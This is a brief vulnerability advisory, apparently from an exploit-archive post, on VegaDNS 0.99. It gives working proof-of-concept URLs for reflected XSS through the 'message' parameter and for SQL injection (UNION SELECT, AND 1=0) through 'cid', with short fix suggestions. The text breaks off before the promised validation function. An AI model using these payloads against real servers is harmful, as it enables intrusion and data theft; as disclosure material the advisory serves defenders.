Author : Ph03n1X email : king_purba@yahoo.co.uk site : http://kandangjamur.net/ vendor : www.vegadns.org version: 0.99 XSS ---- PoC : http://exam.com/vegadns/index.php?VDNS_Sessid=m42644r75o1eg4f7mb7e4rnpg7&message=%3Ch1%3E%3Cmarquee%3Ealoo%3C/marquee%3E%3C/h1%3E Vulnerable script is located in index.php file, $message variable isn't validated. You may validate $_REQUEST['message'] using htmlspecialchars() function. SQL injection -------------- http://exam.com/vegadns/index.php?VDNS_Sessid=ip2eugr7ndn9n9sbnagb9f3p43&state=logged_in&mode=users&user_mode=edit_account&cid=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9%20-- http://exam.com/vegadns/index.php?VDNS_Sessid=ip2eugr7ndn9n9sbnagb9f3p43&state=logged_in&mode=users&user_mode=edit_account&cid=1%20 AND 1=0 Vulnerable query is located in src/users.php file, You may fix this problem by adding the following function and then validate $_REQUEST['cid']